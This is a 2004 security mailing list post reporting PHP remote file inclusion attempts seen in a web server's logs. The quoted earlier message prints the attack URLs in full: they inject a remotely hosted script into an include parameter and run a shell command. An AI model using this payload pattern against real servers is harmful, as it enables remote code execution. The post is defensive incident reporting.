Security Incidents mailing list archives

Re: PHP injection attempt from 200.222.244.154


From: Kirby Angell <kangell () alertra com>
Date: Mon, 22 Nov 2004 20:09:22 -0600

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Haha... note to self, do not include the actual attack URL in the
message.  Judging from this referer:

Referer:
http://gmail.google.com/gmail?view=cv&search=inbox&th=10063111e32eb17b&lvp=-1&cvp=0&zx=18acabd2b173f0d8528652499


I'd say someone got my message from this list and then clicked on the
URLs  :-)

Kirby Angell wrote:
...>
| The attacker IP made 4 attempts to exploit a common coding error found
| in PHP applications. The flaw involves injecting a malicious URL into a
| variable that the given PHP page later uses in an 'include' statement.
| In all attempts, the given page was not susceptible to the attack and
| therefore a 302 Not Found error was returned.
|
| In the first attempt, the attacker tried:
|
|
http://[domain]/uptime3?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a

|
|
| The rest of the attempts the attacker tried:
|
|
http://[domain]/uptime.php?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a

|
...

(I edited them out this time)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBopvS21unUZAE9MARAmb0AJ9bxXgRZE7w2VLzECmwhCXr0dE2ewCeO3La
DrJM5PIDq+0NM2xN6pC6Bak=
=dj/a
-----END PGP SIGNATURE-----


Current thread: